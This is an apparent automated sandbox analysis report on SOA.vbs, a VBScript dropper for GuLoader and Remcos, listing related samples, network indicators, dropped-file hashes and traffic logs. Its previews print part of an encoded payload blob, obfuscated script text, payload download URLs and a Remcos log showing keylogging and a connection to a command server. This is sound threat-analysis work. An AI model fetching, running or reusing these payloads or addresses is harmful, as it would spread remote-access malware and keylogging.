                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 93.184.221.240
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 3516 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 5512 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  01:48:51API Interceptor1x Sleep call for process: wscript.exe modified
                  01:48:53API Interceptor136x Sleep call for process: powershell.exe modified
                  01:50:06API Interceptor881090x Sleep call for process: wab.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  178.237.33.50Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • geoplugin.net/json.gp
                  tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                  • geoplugin.net/json.gp
                  TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • geoplugin.net/json.gp
                  Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  103.237.86.247Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/JrFdfe171.bin

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.netVyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                  • 178.237.33.50
                  TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 178.237.33.50

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  BGNR-AP2BainandCompanySGStatement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                  • 103.237.86.195
                  bot.x86-20240414-2238.elfGet hashmaliciousMiraiBrowse
                  • 103.237.86.195
                  BGNR-AP2BainandCompanySGStatement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                  • 103.237.86.195
                  bot.x86-20240414-2238.elfGet hashmaliciousMiraiBrowse
                  • 103.237.86.195
                  ATOM86-ASATOM86NLVyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                  • 178.237.33.50
                  TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 178.237.33.50

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\remcos\logs.dat

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:data
                  Category:modified
                  Size (bytes):242
                  Entropy (8bit):3.555604565284536
                  Encrypted:false
                  SSDEEP:6:6lVr2c5YcIeeDAl/bdlrYSWn+SkgI9lAIWAv:6lVrBecFbdpYS5s4lPW+
                  MD5:ACD8313F9AE3FCF7398BF4D97C33962F
                  SHA1:79B3F43258E342AB078A31347E6C41AA332993AE
                  SHA-256:08B550FA25225ED8B455B51559A967FAD807C817FA596E9CCB1DD58AF06C7C16
                  SHA-512:F345CA855A30203FF94C780D0354BFB623CE44B6C5F54BAF3CF47D5597A3D4AB0B91C6FCDFA2C15F8143AB6D4A7236B6B92F7597E24ED89E90328EA5691DF027
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                  Reputation:low
                  Preview:....[.2.0.2.4./.0.7./.0.2. .0.1.:.4.9.:.3.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.w.i.n.d.o.w.s. .m.a.i.l.\.w.a.b...e.x.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Windows\System32\wscript.exe
                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                  Category:dropped
                  Size (bytes):71954
                  Entropy (8bit):7.996617769952133
                  Encrypted:true
                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Windows\System32\wscript.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.131891476939675
                  Encrypted:false
                  SSDEEP:6:kKKgMD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:SgdDnLNkPlE99SNxAhUe/3
                  MD5:AC5A3DCE1DF65390C634B92185C478FC
                  SHA1:BA58A1B4D689FBF6159D4704E71CC0996B1195BF
                  SHA-256:8EE280067AEB4E116085B0EA1B49ABB18F29E586D8019B0488528370615422BD
                  SHA-512:E8F7291090320D200067E35BBAAB4BB72477D834DDC779690F8BA91F8195F941145C880BBA63081A977C5524AA8B03C03A0450D9B0E45A53709A2511227A45B2
                  Malicious:false
                  Preview:p...... ..........v.C...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):962
                  Entropy (8bit):5.013811273052389
                  Encrypted:false
                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                  Malicious:false
                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11608
                  Entropy (8bit):4.8908305915084105
                  Encrypted:false
                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                  Malicious:false
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:NlllulJnp/p:NllU
                  MD5:BC6DB77EB243BF62DC31267706650173
                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                  Malicious:false
                  Preview:@...e.................................X..............@..........

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ja312hy.thz.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bq5sbzbw.ohm.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzjpcbxl.fub.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ty3sqv1u.k4z.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\bhvEF08.tmp

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x805247a5, page size 32768, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):17301504
                  Entropy (8bit):1.0290459407497834
                  Encrypted:false
                  SSDEEP:6144:jvQxYV7AyUO+xBGA611GJxBGA611Gv0M6JaX3XX35X3khTAzhTA/hTATX3t8nqke:qyUl3F0TcT0TAitKxK/U51a4Ago
                  MD5:CBD2217A74DAA131B4C40989EDEB7466
                  SHA1:F4EEEDA568D299DB61E0F0877B3FEBCB14B7DD30
                  SHA-256:01EE2C4DDB42FAD3EB1C377F33CE10A5D7BBD5868A58CB150082F0CC6A5A2E07
                  SHA-512:5CAC4353E00FC1EF939F1D090ED7D007CCEA5BB95479CE083A0622CE85766CBCD59174662BE64645DD76C90E826930EC8EFB233E84B3857D7C17099AA06F6F08
                  Malicious:false
                  Preview:.RG.... .......4.........gN;....{........................&....../...{G..1...|i.h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................r...1...|i.................r9b0.1...|i..........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\xmgittpzhob

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..

                  C:\Users\user\AppData\Roaming\Dobbeltrudens140.Aff

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):441636
                  Entropy (8bit):5.859070720948003
                  Encrypted:false
                  SSDEEP:6144:mjsuifzTP4uz9yd6n02PMzn5oZ2lIxJ3OdV/ZquSJ4L18VT/3My8digGgJKc9:QwzUK7JZ2IxtO//guSyw18wgGsKg
                  MD5:D59E9C1008709D12B494ACA6A0755BAC
                  SHA1:B8DA7441418D3FC53CAC50D1959B0858E8611EA0
                  SHA-256:B0558E9C1BE87E061E586BC50823B2B397F7DDDD5FF01FAF7359AB54ED7495AE
                  SHA-512:8EE0CF3FB04C3DD9BA3D4415E17038194F8956F9DABC596E8915D9E11326FEDF55C1B0E2A234DDFB47D4E16F602D66E877CBD9E1A5ADACD15DDE57CD34090338
                  Malicious:false
                  Preview:6wLwvnEBm7sQZA8A6wJuF+sCfq8DXCQEcQGbcQGbuZBM+eZxAZvrAjS3gfEyzgBTcQGbcQGbgcFefQZKcQGb6wJFOesCay1xAZu67kwrtHEBm+sCbKvrAj47cQGbMcrrAlyQ6wKPTokUC+sC2ZxxAZvR4nEBm+sCnWGDwQRxAZtxAZuB+bB+uQF8y3EBm+sC1fSLRCQE6wKHM+sCUOyJw+sCI/txAZuBw3udQgBxAZvrAu3Zut6atnNxAZvrAkBRgfIiIBST6wKuEOsCBBiB8vy6ouDrAs1EcQGbcQGb6wKPf3EBm+sC7xyLDBBxAZtxAZuJDBPrAqPF6wJBgUJxAZtxAZuB+jSeBAB11nEBm3EBm4lcJAxxAZvrAtfuge0AAwAAcQGbcQGbi1QkCHEBm+sCiLqLfCQE6wIeVesCJ6OJ63EBm+sCZ/mBw5wAAABxAZtxAZtTcQGbcQGbakBxAZvrApuJietxAZvrArhWx4MAAQAAAPDLAXEBm3EBm4HDAAEAAOsCHzDrAuPSU3EBm+sCqBGJ63EBm3EBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm+sC+n1T6wLTrHEBm2r/6wJiWOsCReODwgXrAnG86wIgiTH2cQGbcQGbMclxAZvrAktPixrrAruR6wKDbUHrAhBO6wK3azkcCnXycQGb6wKC5EZxAZvrAi5TgHwK+7h13HEBm+sCMWaLRAr86wJo7OsCBhsp8OsCarhxAZv/0usCDu9xAZu6NJ4EAOsCaDxxAZsxwOsCPFrrAlLui3wkDHEBm3EBm4E0B7tF4d7rAnMlcQGbg8AEcQGb6wJV2znQdeRxAZtxAZuJ+3EBm+sCM7r/1+sC859xAZsSovixtcQYWLTxhOJXzAQZPhceIUSRv8ZyxFSMRLoezM9XTl8+Fx4hRBbNJHfEZIxEuh45EL4tkkTIsyFEupQpPpe0V178PjZjPmAvK9yoYjq0lWIE/2QcOoQ87GrHJpq2Rf6O

                  \Device\ConDrv

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:ISO-8859 text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):665
                  Entropy (8bit):4.551612883705425
                  Encrypted:false
                  SSDEEP:12:caFqFkLmxyRbmkclkL6hHRRB7IsuWa/XqdPuN8RuQYQtlXEDQRQtlka5mQlQtlFu:7QFtUbmjlZRdrT5TIaJED2aCaxaq
                  MD5:E9FD0FBD75553D550D06CD4B52BDF716
                  SHA1:2335C9EA583753DC34782B03BA991E32E52394E2
                  SHA-256:FB2D7C41B3934C227014E8967CFCB69345AA773FED3656579C62AD51FADA8348
                  SHA-512:6D1FB68DAEFE7E97FB914B8D5968DC570583016749D2DBAD7FEA76BC1DDB5D44C177EDACF2333E56895ACE32043FC6B148F8C48744C9E54E8AC1AEF64B9D3122
                  Malicious:false
                  Preview:... ______ ...(_____ \ ... _____) )_____ ____ ____ ___ ___ ...| __ /| ___ | \ / ___) _ \ /___)...| | \ \| ____| | | ( (__| |_| |___ |...|_| |_|_____)_|_|_|\____)___/(___/ .....Remcos v5.0.0 Pro.... BreakingSecurity.net....01:49:34:602 i | Remcos Agent initialized..01:49:34:602 i | Offline Keylogger Started..01:49:34:602 i | Access Level: User..01:49:34:618 i | Connecting | TLS On | 103.237.87.156:1993..01:49:34:618 i | TLS Handshake... | 103.237.87.156:1993..01:49:35:962 i | Connected | TLS On | 103.237.87.156:1993..01:49:36:727 i | KeepAlive | Enabled | Timeout: 60..

                  Static File Info

                  General

                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):5.470813048873258
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:SOA.vbs
                  File size:23'009 bytes
                  MD5:67e1e122a412c456946e5206247a92eb
                  SHA1:7262d0ebf405ce41c1000d6e3940099cdb0b8e4b
                  SHA256:68796e148be21fcce665281ce32941c6be58028befb85b7789253dfde8d9e68e
                  SHA512:36a3ef22b3f0eadf589c576552f18f6dda3b05e87fe346eb1a2f0e6c76de7f067bc1f06313a40340e5d1ceb2e75633fcf02d236bd379cea02f95a4564d1a463d
                  SSDEEP:384:jfM5M/u9FzvxM659kumg3/PlwOyTX2295Jy8eteZ9FpJwzuPr6b:CzCMv/P4TXl2IZ9FpJwkrG
                  TLSH:D0A23850692D1FC81D4FEBFB76493C6449289DB347F2C02D6D18A4E0F83868F6D6A5CA
                  File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Hermosa = magnis......Set Troglytternes = CreateObject("WScript.Shell")......Call Pjaltene("cls;write")..Call Pjaltene(" 'Unblessed Assimiler

                  File Icon

                  Icon Hash:68d69b8f86ab9a86

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 07:48:55.343225956 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:55.348146915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:55.348247051 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:55.349364042 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:55.354151011 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.319933891 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.319960117 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.319972038 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.320029020 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.320040941 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.320056915 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:56.320091009 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.373629093 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:56.577244997 CEST8049711103.237.86.247192.168.2.6
